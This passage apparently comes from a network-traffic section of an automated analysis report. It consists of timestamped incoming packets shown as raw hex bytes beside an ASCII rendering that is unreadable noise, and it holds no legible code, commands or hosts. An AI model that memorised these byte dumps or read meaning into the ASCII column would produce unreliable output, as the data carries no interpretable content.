b4 c4 b9 8f b0 7d f2 8e 77 3a 80 b2 c1 71 c8 c3 dc 8e 16 49 58 6c 6b 60 e4 66 73 0b f8 2e 3c Data Ascii: U2]Wb;X.qnUPR7<}Sc57$J{s/npMqgG;9;D/D+@1N9"@6L%5cGmu*7~xtF[!q(U#ufIFgps >9Ox&vwM38}w:qIXlk`fs.<
2023-08-14 11:02:43 UTC	32	IN	Data Raw: c8 ab 03 da 3e a3 7a 8b 0f fc c6 0a ec f1 c9 d6 5c ca 40 8a 6d ab 03 3c 1f ed c2 27 23 44 1c 39 06 17 96 fb d4 b2 7a 75 1a 98 47 ce a7 7d 6e 77 87 0a db 6b 14 ea f8 62 72 8d be 69 28 e7 56 6b 87 24 a6 03 9e 41 44 c4 e8 8e 12 69 b7 c6 b8 64 1e 43 17 7e eb bc c4 f6 71 45 70 72 fd 6f 3d b4 f5 c8 73 74 f2 27 57 9f 93 1d 88 f7 48 08 7e d5 d0 b2 67 50 00 31 aa c5 59 14 6c d1 cf f1 bc 7c ac 03 e7 96 9e a4 00 d2 30 1d d6 25 b0 6e 2e fe 21 dd 6b ce dd 01 f5 47 af 7e 55 18 28 37 b0 7c 9e b8 3f 05 a2 b9 96 6a a0 7d 80 2b a7 7c 3e 57 49 79 78 6c 1b a1 d9 93 b5 16 1b 78 4d 0b c5 bb cb 36 6e be a0 a0 8c 86 45 b3 d0 ed 0d fa b0 95 31 a4 81 fa 41 72 b9 6b 71 50 36 88 aa 53 33 8c 97 db 08 ab 82 a7 08 1a 3b ef c9 04 25 52 01 93 22 13 89 0e 7d f9 74 ca 90 a5 38 46 54 f6 33 Data Ascii: >z\@m<'#D9zuG}nwkbri(Vk$ADidC~qEpro=st'WH~gP1Yl\|0%n.!kG~U(7\|?j}+\|>WIyxlxM6nE1ArkqP6S3;%R"}t8FT3
2023-08-14 11:02:43 UTC	33	IN	Data Raw: b3 4a 50 f6 fc f2 92 17 44 1b 43 4a 46 7f 93 82 59 42 ec 19 42 48 fb 01 ea 61 bf a4 0f 0b 94 cc 90 2d cb 08 e0 6f 1f 36 24 ee cb 58 76 93 72 ed 38 1a 6f 6c 1a 5f 62 17 77 f3 2c 54 09 f9 02 2e 3d a2 bc 82 24 47 76 1f 16 0e 6c c2 2c db 9a f5 25 6e e9 b7 4c a5 8d f2 b0 d2 f7 39 a8 a6 03 ec 6f 43 ea b6 93 9c fc 6a ef 8c a9 93 19 af 59 ed bf 02 f1 62 4d 81 f4 22 e8 82 c1 f8 1e 09 33 3e ea 91 af 96 99 eb 5b 9f ca d2 cd 7a f5 22 02 c0 a8 07 e8 cb 8a 19 66 38 2b 4b 5d fd e6 eb b4 ee 7c 4e 8b fd df 7b d3 75 cb 52 23 29 83 32 46 cb d2 10 77 00 46 20 7e 4c e6 d3 15 c0 ad de 4f fc 41 c0 d0 fc f0 cb 62 ff 3d da 0f 5a a0 e2 21 08 cb cc 0b 5d 2c 43 e4 94 74 1f e1 3e 77 99 14 fc 7d 93 99 b1 64 1a d8 b8 dd 3f 6e 1b e3 4e e1 9f be 4d 8f d2 07 89 ae 69 49 b4 4d ff 5b 23 83 Data Ascii: JPDCJFYBBHa-o6$Xvr8ol_bw,T.=$Gvl,%nL9oCjYbM"3>[z"f8+K]\|N{uR#)2FwF ~LOAb=Z!],Ct>w}d?nNMiIM[#
2023-08-14 11:02:43 UTC	35	IN	Data Raw: 0d 6c c3 7c ac 1c 05 88 d5 04 71 52 d3 f7 0b 90 28 b0 57 4f c3 3f 55 eb ac 29 e3 87 df c5 d5 66 3c dc 2c 30 08 22 15 de bb 67 7e b5 3f 5f 59 ef e6 b0 fd 70 34 c0 cf 77 e6 77 02 0a 84 24 3f 65 6d 23 67 0f 5d 07 f0 03 c0 0d b9 7a e0 3e 67 b0 06 98 7b 83 cf 19 9e a0 5b 3f f0 a4 83 d7 02 44 b8 71 f3 3a 7e cd 0a 90 6c 4b d4 f1 b9 66 3f 9f 20 b2 c4 a7 59 70 d3 80 71 63 2f f5 0d 01 92 bd 48 6d 5a 3b 92 06 35 ca b6 0a a0 bb 7e 23 dc 4d 61 85 0a 19 9b f4 b4 b4 b4 55 de 53 bd a2 a7 00 1a ad 11 60 d1 b2 e0 5f 0b 87 75 30 e8 6a 77 f5 dd 56 73 14 0b 8d e4 a5 b2 64 b9 b0 0f 1e 20 41 41 c0 d0 7a b6 c5 54 09 b3 53 16 2c a1 bc 30 93 3f 8f f8 64 f4 db f6 0a d5 c2 2e fc ea 6e d2 5e 9b bf 37 c8 46 5a 2e 57 1b e0 e6 92 00 4c e1 5e cd d4 c3 82 03 6f bc 2b d2 21 21 a2 63 09 37 Data Ascii: l\|qR(WO?U)f<,0"g~?_Yp4ww$?em#g]z>g{[?Dq:~lKf? Ypqc/HmZ;5~#MaUS`_u0jwVsd AAzTS,0?d.n^7FZ.WL^o+!!c7
2023-08-14 11:02:43 UTC	36	IN	Data Raw: 6c 84 78 a5 75 3e 6d 61 b8 9d ae 88 fb 3b 7a a3 ad c8 18 9a 3a 29 bd fc 51 c8 1c 9d a2 fa 75 18 69 45 ce 3b de f4 cd a9 43 e0 95 5c 34 f5 90 f5 93 c3 1e 7c a1 f4 63 c7 e4 87 ec b1 2d 77 74 59 3d 8b 9f d1 fc 0a 37 e5 ce 37 d5 0a 94 d0 2d e4 cc ff f7 34 c1 76 84 4d 68 8b e1 58 7f a7 e1 ff 00 3f d2 ee 4f 4f 4e 65 de 88 f7 11 e9 62 b0 e8 21 f6 bd 0e 96 dc 4f 1e fa 2c 9f 26 13 90 d4 1b cc 46 58 73 44 8d ee 06 00 ba f8 02 91 0c 36 0d 15 74 b8 b1 bf 92 52 28 2a a7 a4 dc 9a 53 11 d2 df cd 4f 18 7b 81 e3 ce 56 98 d5 12 b0 5a 25 52 84 8c 25 ef 39 31 11 97 0f 97 7f 7b c7 fe 23 41 6c 9e da 7c f0 33 94 d1 83 06 b2 85 ef 47 50 20 69 49 26 b1 c1 db 21 b5 63 33 8c 68 f9 9a ac fb 3e 32 e5 c0 66 c6 be 35 7d 99 d0 aa 74 8f b7 4b 3c 88 a4 1e 7c b9 3c ad c9 33 45 72 5d bd d7 Data Ascii: lxu>ma;z:)QuiE;C\4\|c-wtY=77-4vMhX?OONeb!O,&FXsD6tR(*SO{VZ%R%91{#Al\|3GP iI&!c3h>2f5}tK<\|<3Er]
2023-08-14 11:02:43 UTC	37	IN	Data Raw: c0 d9 31 cd 06 fc 4e cf 0e ce 2b 25 d3 7d 1c 62 55 dd 83 bc a6 73 4f ab f4 cc 21 b5 64 ad 66 a6 3b 18 45 e5 8c a9 2c 4c 6f c6 2f 80 15 f4 48 66 59 44 d7 76 3d 8a 1a 9c 22 1f fd 60 e1 4e 5f 35 4e 60 da 36 d8 c5 c4 0e e9 54 97 fd 8c e6 66 3e b5 1b 86 ac f5 70 4f ed 11 71 e7 75 4f cd c6 68 a0 da 0d f7 bd bb 68 0d f6 1b 7f 1d b3 f5 8c f7 5b c2 cf 44 ff 37 74 1d 5c ed d8 8d 85 c1 4d df f3 c6 28 9c 62 a9 ad c1 76 7d 97 1e 22 ef 85 f3 06 96 3b 45 52 f7 c8 37 5b 68 5b e9 1a 2c 22 86 d1 d6 36 9d 05 dd 3f 59 37 b6 67 c2 37 67 8f 06 b7 97 12 17 bb e0 82 0d 40 4f 29 5c 92 94 37 62 ae 44 7e ee e4 d7 a3 f0 ac 5d a6 f6 c0 59 a5 df b9 ac ca b4 3f e2 be 28 5f ed 03 33 79 e7 81 a0 95 77 ec 18 99 55 22 6c 66 b5 ff a4 94 73 ac 35 9a cf 9d cb ad 28 e8 d8 ac 06 56 c0 da 03 eb Data Ascii: 1N+%}bUsO!df;E,Lo/HfYDv="`N_5N`6Tf>pOquOhh[D7t\M(bv}";ER7[h[,"6?Y7g7g@O)\7bD~]Y?(_3ywU"lfs5(V
2023-08-14 11:02:43 UTC	38	IN	Data Raw: c6 89 57 23 74 58 0e 0d 0f be 42 03 fe d9 17 f3 f7 87 a8 ba 4a f8 d5 f4 cb 89 8c 3c c2 cc e2 22 59 03 9f 2e 9b 0b 13 71 c2 05 dc 0e f9 ef 73 36 6a fc fa 30 ef f9 72 17 22 24 c7 d3 e1 fc d7 5f a6 bd 0b 7b 34 e3 94 0d f8 a4 6e 07 ca a5 ce 38 c3 0f 59 0b a6 da d2 3b 26 7e 23 c2 99 73 fa 69 9f 3d 1f 70 31 92 7f e3 03 9e 7e d5 0a b0 9b b0 8b f7 06 51 31 12 2e f6 4d f2 75 5e 03 95 b8 e7 73 52 6d 9b b0 66 bf 79 27 ce 28 5f ae 53 64 a2 dc 39 aa 16 0b b1 e4 8f 8a 15 76 5c 35 03 27 c8 de f4 5a aa 2b 19 e8 92 51 d3 0c b9 a0 c7 b1 9b ca 2d 4a 1e cf 31 d1 1f cd 40 4e 39 a5 82 af 65 c9 fb 62 cf 06 3f b3 81 fd 48 a5 e7 ec 75 66 94 b3 2b ec b1 e4 70 ce d9 17 04 6e 35 93 69 d1 e0 d9 a1 d6 61 db df 9b 53 ca 73 82 7c 6c 5f de 49 2b 19 ce f8 a8 49 61 86 f2 f0 bc 92 65 72 1b Data Ascii: W#tXBJ<"Y.qs6j0r"$_{4n8Y;&~#si=p1~Q1.Mu^sRmfy'(_Sd9v\5'Z+Q-J1@N9eb?Huf+pn5iaSs\|l_I+Iaer
2023-08-14 11:02:43 UTC	40	IN	Data Raw: a0 55 62 1e 76 a7 01 e4 5e 05 65 2a 52 7b 82 6a 69 11 59 6e a5 56 85 80 dd 7d 4e 20 f6 a9 51 b8 58 27 34 66 8a 88 9e 9b e6 d7 49 37 1a 22 94 15 d8 58 39 0d 41 27 89 9e 4a f7 bd d4 1d c1 e0 5b 19 63 cb 7f e2 8d d2 8a 10 ee fa a6 e8 da 1b a4 d5 d3 01 a9 8e db 07 e8 c9 c0 79 a1 73 f4 3e b7 25 32 95 3f 44 4f 84 45 03 c9 1f 8c 4e ff 68 ca ef 80 ff 2d 9a 3d 6a b0 0a 63 c8 ee bf 83 bb 1b ee b8 98 65 fa 84 c1 fd fc bb 01 f1 f2 2e 1f 91 0d 85 36 9a 21 c0 21 3e 21 6e cc 70 89 fe 6e 9a 59 08 12 20 b9 d2 1c 01 d9 cd c2 ec 90 b0 0d 2d 74 91 a1 2e 19 22 b9 9d 25 6e c1 1b 7e 0c 06 66 dd 16 12 7c 0e 7a e0 10 76 1c 35 c5 00 59 56 db d4 8d 56 21 18 00 cf 2a e1 b9 53 9d 73 a5 71 82 4e a1 94 78 fa 32 1b e8 30 63 06 39 13 2f 14 5e f9 0a cd cc af fc da 4f c6 a6 69 4d df b5 93 Data Ascii: Ubv^eR{jiYnV}N QX'4fI7"X9A'J[cys>%2?DOENh-=jce.6!!>!npnY -t."%n~f\|zv5YVV!SsqNx20c9/^OiM
2023-08-14 11:02:43 UTC	41	IN	Data Raw: f0 8d ae 2e a1 98 0f 4f 52 3c 7a 6d 55 25 7f 51 dc a8 50 14 ec 86 94 a5 18 50 d2 d8 ac 8e 42 12 29 6c b8 57 06 56 a7 04 ce 99 0a 41 d8 82 4f 84 78 b9 b5 ad 7d 00 77 47 7f 4f ba 9e 86 01 b7 a4 5e 9f 2c aa d8 fd b8 95 86 e9 47 24 fe 0a 16 70 15 15 5a 26 65 d1 88 fc 1a d9 9d 4e 58 01 77 81 9a b3 3b 02 ac 66 d7 ac ac 31 07 84 36 72 ce 91 45 0f c9 85 8b 83 82 13 b9 66 76 62 c0 84 9b b8 29 dc 7c 0f 3c 8f 0e cd c1 ca a0 7e 85 3c 9b 23 3b b9 c7 85 44 fe c6 a5 20 5c ff e3 85 d3 ac e4 95 81 ef 2d 9b fc 07 18 2b 79 e1 1b a1 d9 20 7d af d0 ec 9f 7e 05 cd ba 55 59 97 35 48 5e 09 0d 81 1f 6a 19 e9 73 c5 36 24 11 5a ff 8d da 4e bf 6f 89 88 0b b7 b7 15 6b ad b2 7b f4 ec 3f 3f b1 78 06 e6 91 41 44 6b 2c 23 81 e6 3c 3b e3 d5 47 a9 e4 f8 90 27 0b 3a 87 88 21 3e 6d 1a 35 04 Data Ascii: .OR<zmU%QPPB)lWVAOx}wGO^,G$pZ&eNXw;f16rEfvb)\|<~<#;D \-+y }~UY5H^js6$ZNok{??xADk,#<;G':!>m5
2023-08-14 11:02:43 UTC	42	IN	Data Raw: 19 cf 9e 23 0a 03 f9 6a 14 26 71 55 a0 39 fd 7f 9f b8 c1 d5 0a 68 33 36 4e 6b b9 1a 1e 94 fa cf c2 d0 d3 b0 20 fb 09 4c 00 64 f9 25 d5 2d 2d 31 cf 20 43 2a 01 95 99 3f b5 43 5f eb 1f c0 e0 75 38 71 06 20 a1 59 96 18 ae e9 5f ca 49 9a 81 f0 e9 28 36 c5 23 71 92 39 20 6e ff 35 33 eb 96 6c 8c 23 c2 22 d7 8f 23 40 15 dd d4 5a 05 f0 2d 94 1f 8e 23 db bd 37 e3 e7 ae af 3f 31 da dc 5f bf 06 f3 3a 01 d2 fd 80 3f 16 a5 34 a8 f9 df 42 80 f5 d6 e5 2e ce 47 94 01 ca 47 6a 99 a9 4d 15 9a 45 cb f9 48 72 46 6d dc 08 81 ee 1c 4d c8 89 28 44 e8 b5 a1 a1 52 d8 4d 75 84 ee 18 81 ed e1 3d ae 7c 29 e7 2a b4 72 49 a9 6a 08 93 a5 50 9c 74 b9 33 16 17 24 83 eb fd 57 95 0a df cd a8 b8 74 c5 e0 53 a6 c1 f6 01 e3 16 d0 8b c7 bd 6d c0 2b 04 45 dd 1a cb 78 ed b1 67 fa 54 d9 94 83 8b Data Ascii: #j&qU9h36Nk Ld%--1 C?C_u8q Y_I(6#q9 n53l#"#@Z-#7?1_:?4B.GGjMEHrFmM(DRMu=\|)rIjPt3$WtSm+ExgT
2023-08-14 11:02:43 UTC	43	IN	Data Raw: 35 1b 8f 8b 3a 70 a9 be 8d b2 9d 6b 00 fa be bd c1 59 a1 f0 b1 b7 49 7a e3 28 9c 6e 92 09 15 0a 41 f1 cf 94 19 47 b8 f1 d3 64 70 fe 70 0f 55 a7 9f 98 2c ab 50 89 d9 e4 35 e4 62 0e 1b 44 76 47 2b 1f 75 77 78 77 33 90 69 eb 08 39 8e 9c c7 f2 d9 0a a4 ac 05 b4 42 09 38 87 60 d2 d3 be f2 0a 29 78 ad 84 81 2b 5c 9d ec b8 db 4a 00 04 b5 5a 62 f4 4f 21 91 29 54 fe 18 d7 72 ba da 56 37 0f 4c 16 30 dd f3 70 fd 6e c2 cb ce ed 45 24 4b 72 60 ba 3f 78 37 f1 ff ca 83 34 2d 11 ef 21 12 de 7b c4 b9 c1 ae 1e be 69 2d ea eb 80 26 19 b4 63 1d 84 c3 2c 56 0d 08 68 79 f1 5e 96 9c 6d 7c e3 be 1e 2c bf af ee 00 23 c3 6b 20 84 34 57 34 00 3d d1 7f c5 64 a6 93 8b 19 00 88 ae 9a 63 d7 a4 b9 3c 0a 87 81 b3 09 b7 5e 4f 7a 21 7b 55 d4 d9 88 90 68 71 b6 23 fb 0d 9b bd 2b be f2 18 86 Data Ascii: 5:pkYIz(nAGdppU,P5bDvG+uwxw3i9B8`)x+\JZbO!)TrV7L0pnE$Kr`?x74-!{i-&c,Vhy^m\|,#k 4W4=dc<^Oz!{Uhq#+
2023-08-14 11:02:43 UTC	44	IN	Data Raw: 31 35 6c 5b bd ff bf 59 70 6c 5d 2d fc b6 6e 5f 48 68 8e 49 b7 fc ac 27 82 21 4b 43 41 62 6f bd 8a 95 5c 34 6d 9b f5 93 28 c8 35 2c db b9 11 ee 87 9e 69 b5 c1 00 61 e9 08 ba 1d c3 81 f8 d3 c2 0e af 75 63 5a db 98 a6 46 84 0c bb f4 06 a1 ae 9b cd a6 80 9f 12 7e 76 7d dd 10 f8 3b 83 d6 59 37 c2 65 f3 77 fa f8 6a dd bb 72 7f 75 83 17 a4 10 e6 68 e3 f8 c9 70 cc 2c ad fb 01 ae e6 db 1d 15 8a 47 2d d7 ab 35 85 14 ed 0f 40 5f 1b 63 8b a6 21 7c 6f fb 86 7a 23 1a 06 37 35 f7 e9 ce 22 eb fb f2 11 dc a0 a3 f8 0e 36 d6 4c 8d 97 d6 1a 3b 8a 84 6b 30 35 33 ff a5 0f 47 40 24 3d 9a cb 8e 05 57 9e 53 e4 df 13 0c 93 dc c6 61 58 f2 e2 90 fe 0b 0b ca 21 79 4b de 78 3f 9b 8f 33 5f a8 a2 aa 7f 65 d0 09 4a b9 48 99 ef c0 38 39 24 10 33 f0 da 82 85 27 9d 97 61 e1 c7 43 ad 5f aa Data Ascii: 15l[Ypl]-n_HhI'!KCAbo\4m(5,iaucZF~v};Y7ewjruhp,G-5@_c!\|oz#75"6L;k053G@$=WSaX!yKx?3_eJH89$3'aC_
2023-08-14 11:02:43 UTC	46	IN	Data Raw: d7 20 53 71 60 4b 7c c3 f2 68 20 ae 73 33 97 fb 9a 03 07 22 9e 79 d8 38 e8 0c f0 df 86 f8 87 67 c6 89 4f cf 7e b7 44 81 eb 75 02 2e 25 f9 93 24 d8 78 9d 53 4d f0 18 9a f9 ef f1 35 b0 33 f1 96 9a cb 31 cd de 66 86 4d 61 ba e8 d1 71 55 7c c3 3e ef 01 6f 5a 06 d6 a1 1d 05 f2 ba bf 68 f2 a1 4b d6 75 94 8e 84 83 d1 b5 84 c9 78 37 b4 61 54 12 27 4d c1 a5 ba e5 89 b5 df 61 9d e1 3b 6e 1d d0 d1 0d 17 7a 73 c8 c5 30 72 7d 5a ee cf 35 5b db 0f f4 13 1f 5a e1 d9 78 9e 1b fd 45 82 cf 3f a7 60 c4 37 13 22 14 d9 af 47 3e 09 e7 f8 d1 11 73 e6 1e e7 c9 3f 62 01 c6 e4 5e 1f ef d9 08 b3 52 8c 06 20 b5 b5 76 34 00 d5 3e 62 da c4 13 50 9f 49 8a 8d a6 6a de 11 c2 1b e7 e5 b5 6f 27 c2 f9 77 08 c2 cd 53 bc 9e 42 0e ad 69 94 5e ac 16 34 2d b4 91 c9 7a c9 ee d0 5e 1b 65 b3 99 86 Data Ascii: Sq`K\|h s3"y8gO~Du.%$xSM531fMaqU\|>oZhKux7aT'Ma;nzs0r}Z5[ZxE?`7"G>s?b^R v4>bPIjo'wSBi^4-z^e
2023-08-14 11:02:43 UTC	47	IN	Data Raw: 0a 64 99 3a 8d 1d a7 51 ed a2 d3 57 0c 90 21 8f 86 8a cc bd c6 7d bc 51 e2 4e 2b 9b fb 29 4a 9a 83 59 9d ab 7a 81 6f e7 09 21 0d 95 62 78 4d bb 46 29 30 c5 b6 d7 b1 a5 bd 0b 24 d3 0d 89 7b 9a a2 9b a1 8b f6 16 09 3a 7d 1b f3 a3 e5 ad 0f 06 60 f4 b0 e3 a9 00 e3 98 90 9a 58 ae c8 68 64 b5 a6 c9 78 88 95 dc 87 29 35 fe dd 83 c5 50 89 4b fe 2f b0 05 1d 3d 0e 0d 29 6b 0e 4f 36 90 51 52 a4 30 28 a8 c6 8b 93 65 d1 f7 90 8e b0 a0 00 8e 53 81 af 90 ae a5 01 14 cb c3 0f e3 97 ac ae 2b b8 4b 76 01 ce 3a ab 07 80 df df 5c c6 48 bb e1 04 c3 0d e8 e5 a9 65 c5 99 be 05 e8 4d f1 dd 88 87 16 9e 19 8f de 6b bf 09 c5 34 15 87 b7 8e 11 08 34 d6 f4 20 f3 2b 3a a8 49 17 a1 dc 27 ec 79 39 ba 5c 69 5f de 7e 8b 9f c3 3f de 58 b9 fc e1 85 33 8d a4 08 6e 78 77 99 05 ec 86 ad 5d 41 Data Ascii: d:QW!}QN+)JYzo!bxMF)0${:}`Xhdx)5PK/=)kO6QR0(eS+Kv:\HeMk44 +:I'y9\i_~?X3nxw]A
2023-08-14 11:02:43 UTC	48	IN	Data Raw: 21 46 b3 ec 7b 6a 35 2f 29 23 b5 ae 2a be 45 2d 66 7f f6 19 f8 fc af 4b 15 ef 27 62 a7 92 5a e2 d7 35 f2 16 11 54 92 03 c7 94 a5 d6 61 00 c3 8a 58 90 d7 a7 3e a0 7e 89 57 8e ef 8f 08 91 8a 10 2c 87 b0 28 11 1b 3a 5a 63 ad e9 d9 b3 5b 4b 0d ac 6a 46 45 80 0e c3 a9 76 d4 43 3a 6b 0f 50 0b 83 9a 4b 4b e3 bf 51 51 40 a3 41 62 42 10 37 7a 64 b4 29 b3 06 0c a8 7a ae 67 cd ed 88 07 bd c4 2b 6c 55 90 2e 1f 25 bd 81 2d b5 bf dd 25 3e 87 c7 e4 e4 28 c6 14 4b f9 a8 de e0 92 e9 0e 2e d8 e9 39 13 3f 53 40 0b 7d 56 cc 7e 2a 22 b9 3d 12 7f 1b 59 0d ec ec f3 2f b8 eb 3a 8a bd 65 de 65 05 52 17 fc da 92 10 62 d1 f3 1d b2 35 22 7b b0 28 81 55 8a 5a 8e 02 af 7c bf fe 7f 29 28 74 8e 8a 71 d2 29 50 6e 09 89 05 b1 08 ac cf 23 87 c7 00 93 b2 20 66 02 72 23 10 06 89 52 a9 47 a7 Data Ascii: !F{j5/)#E-fK'bZ5TaX>~W,(:Zc[KjFEvC:kPKKQQ@AbB7zd)zg+lU.%-%>(K.9?S@}V~"=Y/:eeRb5"{(UZ\|)(tq)Pn# fr#RG
2023-08-14 11:02:43 UTC	49	IN	Data Raw: 05 77 92 df 46 fc 64 af 6f a0 68 79 b9 31 22 17 19 ba aa f6 3d 40 b4 8f 2e fd 08 7f 1a 58 48 47 ff ae 86 9b 29 4d f8 7f 38 4e e0 cd 9e fd 9a 21 b0 45 17 31 54 07 62 db c3 d1 bc b0 70 f8 d5 4a 10 f8 4b 87 7e e9 f9 65 9b fe 39 25 4a 8a 5a 66 a8 ec da 6b 90 1a 70 a5 b3 3b 08 b9 76 9b e0 d1 04 3d 3e 39 fa be 61 09 43 09 09 f3 bc 08 f5 f0 db ca d0 74 98 aa 1d 97 23 e3 92 76 8f 74 4a 65 6c da f2 03 88 c7 e5 be c5 6c 92 2c b2 49 52 31 18 82 72 77 a9 53 6e 5e c5 10 af ea 79 fa e7 d4 a3 61 13 e9 1e 25 cb 68 20 97 8b bf 41 f5 2b 38 a7 af 35 48 36 ff 0d c8 d7 6b 52 14 8c 3a 4b 07 f9 b6 c7 f7 c5 6b 73 50 80 80 bb 0b 70 c9 7a 15 b1 6f dc b4 1c cc f3 3d Data Ascii: wFdohy1"=@.XHG)M8N!E1TbpJK~e9%JZfkp;v=>9aCt#vtJell,IR1rwSn^ya%h A+85H6kR:KksPpzo=
2023-08-14 11:02:43 UTC	50	IN	Data Raw: 95 9f d5 be 5b 2f af 5e aa 63 e9 f7 74 ca 12 5e e7 e6 bf 80 68 38 87 2e f5 e0 ac 9d 76 21 3b 91 a4 85 fe cd d3 82 54 d8 c9 8a 81 56 da 24 d5 8e 71 7e c5 e5 fc ba 6d 4e 5b f7 5a ea 08 77 6a 64 3c 84 fe 1b ab 52 a7 81 5e e3 3c 69 28 b1 a6 b9 7d 74 74 59 29 ff b1 6b fb cf 74 a5 cd 36 67 bd de 2e e3 e2 b5 f2 f6 34 fd 48 f8 2a 96 8b dd 5b 7f a7 99 f9 9c 02 ab 8d 7c 4d b7 ee 1b 3e e7 67 f3 c0 3b 42 6a 22 f9 67 5e 77 83 17 7b 2c 92 e7 a1 e9 e4 72 cc 46 9c 39 0e ed a4 c6 34 17 8a b8 86 5c 60 f2 c7 0d f8 0d 40 e8 db aa 3a 11 63 59 7e f9 86 c5 d5 cd 4f b8 77 d6 f4 cc 22 99 fd 0c 28 11 e2 8e e1 0c 36 29 38 cc 78 81 58 12 8f 86 6b 8a b5 33 e9 5a 4d 72 41 26 3d 2d 48 23 b4 d8 dc 62 e9 dd 13 76 da 9f 66 86 1a cf eb 92 fe d2 49 41 6d 9a 09 e7 8d 3e 9b 39 f6 e1 ca 29 e8 Data Ascii: [/^ct^h8.v!;TV$q~mN[Zwjd<R^<i(}ttY)kt6g.4H*[\|M>g;Bj"g^w{,rF94\`@:cY~Ow"(6)8xXk3ZMrA&=-H#bvfIAm>9)
2023-08-14 11:02:43 UTC	51	IN	Data Raw: fa 7c e7 d2 0c 2e fe c9 48 fd a7 22 db 9d 35 ab a8 1a a4 0a 86 09 1e 63 52 3a b1 e3 57 4c 92 00 65 86 0d f2 c5 70 5d 41 59 c5 33 a8 bd fd 20 8d 2c 1b 49 62 7f ae 81 45 ae 86 38 53 98 b2 2b 87 8c ea 03 6a 2f 7f 7d 3a 94 cf 09 c4 af 53 3a a8 6c 96 47 a2 4b fe de fa 70 f7 0d f1 ae f9 56 6b bb 55 68 39 ff 4a e1 88 fd 71 db fe 9e 42 18 b2 1b 62 87 b0 1c fe 78 72 8a 05 77 f2 a1 07 1c 75 54 ee c7 58 2e 3f 8b c5 1b f0 31 da 63 2a 9d 61 0a c5 79 32 cb 7c d8 9f 62 a9 bb 51 5b e3 09 c2 be de ea dc 62 c7 99 79 19 3f c2 06 2d ca f6 8c a4 59 20 86 a5 77 e2 0e 84 19 7e e4 4e c4 68 be 3e 97 5a 33 e4 68 c2 c9 94 02 54 9e 5d cf cc 98 62 85 2e e1 01 36 70 53 e3 a3 a4 21 85 cd 64 09 3f b8 08 07 5d 53 dd 90 75 a6 2a 5c 58 eb 6e 40 46 0c fb c2 9b f2 0f 1b 1a 91 a5 d2 3f bf 33 Data Ascii: \|.H"5cR:WLep]AY3 ,IbE8S+j/}:S:lGKpVkUh9JqBbxrwuTX.?1cay2\|bQ[by?-Y w~Nh>Z3hT]b.6pS!d?]Su\Xn@F?3
2023-08-14 11:02:43 UTC	52	IN	Data Raw: b5 40 17 94 83 f6 cd f8 be bd 79 17 66 5f 26 77 a1 b3 b2 f6 c8 07 1f 3c 36 6d 7c 02 a9 85 90 51 3b d0 e5 58 ae 6e 07 34 15 34 ea 79 fb fc 9d 37 c2 c0 2d 7b 84 e9 5f 1c 18 0b 52 a6 47 c7 18 f1 db 18 8e 9b 18 be 2f 11 1f 82 4c b2 44 81 c5 29 d9 30 52 8a b4 03 62 d4 23 42 61 22 6f 8f 62 0d fd b4 67 8d 3c 7d 0c df ca da d2 4b 47 00 84 ca f8 65 ff 69 e3 ea eb d4 a8 c8 97 23 18 ed 81 bf 0d 62 98 8c 22 49 f9 57 54 8b 48 f5 46 fe 2f 5c 8d 70 7c c9 db 45 92 67 4f c9 99 8c a7 af dd e1 51 6a 9c d3 f4 2e 08 dc d3 bf 9d eb f4 31 fd 99 fa 69 4a 91 be 62 d4 f0 35 5b a5 03 ae 46 b2 04 7d 82 b0 68 61 17 0c af 4b aa 48 4b 94 80 a9 84 f8 fa 58 98 3a 5e 6b f3 f9 6f 9d 6e fe e4 b2 49 fb d4 d8 17 84 b4 3e a1 a5 b4 cd d9 69 34 cf 5e 84 30 32 71 43 f0 4f 17 11 24 f3 27 88 06 cb Data Ascii: @yf_&w<6m\|Q;Xn44y7-{_RG/LD)0Rb#Ba"obg<}KGei#b"IWTHF/\p\|EgOQj.1iJb5[F}haKHKX:^konI>i4^02qCO$'
2023-08-14 11:02:43 UTC	53	IN	Data Raw: 2c 36 2d 7f 09 b4 46 c1 54 70 ba 03 33 1c 6a ec c7 69 f4 d2 a2 55 62 76 33 0a 98 5a 6d bf 30 c1 77 84 95 82 81 bc f4 b7 d8 58 15 73 a7 74 6b 63 11 21 4b af 4b d9 65 99 0c e5 d7 76 45 a3 57 9b e9 ee ab 5a 30 98 e6 df 75 da 76 61 41 1a 71 48 a3 3e dc 3b 83 72 23 ad 68 93 95 fe 1f 3c 8f d3 58 f3 15 df c5 63 ad 00 5a 72 ef dd e2 c0 c7 51 84 69 3e c3 02 04 0d cc 3e 6b 7d 37 6f 9b 49 64 c5 f5 bb 51 2d 44 b4 3a 9d ed 6a b0 7e 73 3e 47 4c f9 cf f2 9f 2d 63 cd 4b 54 28 8d 9e 13 16 8c 38 39 89 70 36 76 3c 2d b1 9f 80 9a f3 dd 79 a7 45 8a 7d 90 54 00 de 95 ef f9 fb 7a a2 9a 05 e8 e4 d8 76 0a 35 6e 3c e6 5c 85 22 fe 5b 5d 67 61 db f3 ef e4 d8 22 05 ca 84 8a 63 82 92 7f 5b 4e bf 89 f8 d7 b1 a5 c0 83 b2 74 a0 bf bc dc df 1e 5b f2 99 7a b5 f6 08 69 77 89 e0 dc 21 8b dc Data Ascii: ,6-FTp3jiUbv3Zm0wXstkc!KKevEWZ0uvaAqH>;r#h<XcZrQi>>k}7oIdQ-D:j~s>GL-cKT(89p6v<-yE}Tzv5n<\"[]ga"c[Nt[ziw!
2023-08-14 11:02:43 UTC	54	IN	Data Raw: 94 39 68 c2 ca 35 e3 b8 e3 e3 b9 94 cf da 9c 3e 03 b6 1e ca 99 80 64 e5 c7 11 d9 78 b7 c8 df a3 46 cf 89 f8 42 21 68 f8 dc 2c a7 82 91 43 e6 7b 01 1d db c2 35 37 20 3e 0b a0 47 37 0e 9f b2 11 78 f4 f5 e5 0d f4 86 b8 0c 1c 9c a8 dd 1f 52 5e 13 44 4f 26 9a 87 73 1d 14 76 5d c8 c5 82 f6 c7 2c 7e 63 78 7d cf de bf a0 c6 f6 28 66 de 17 ca 7e 0e 1a ee 2c 5f ae 81 a3 9f 81 cf 0c 04 c0 c1 90 9b 6b cc ba 7b 0f bd 1e c0 8a 74 80 57 c9 e8 84 e4 3f 2a 04 9d 2a 0f fd c5 0e cd 13 63 7c e7 0f 4e ff 14 6d 51 d0 02 2c c4 60 df b9 ab 23 98 8b 3c ac 8f 94 e9 75 a6 2f fd 6f f8 47 d1 15 4d 49 f6 cf bc 6a 5c ac 6c fb c5 b9 eb ed c3 0b 97 48 f8 d3 a3 68 42 b3 3d 16 2a 9b 3d 0f d8 22 ec 18 51 fc 8d 50 bc 03 86 af dc 4c e2 6b 8a 9c 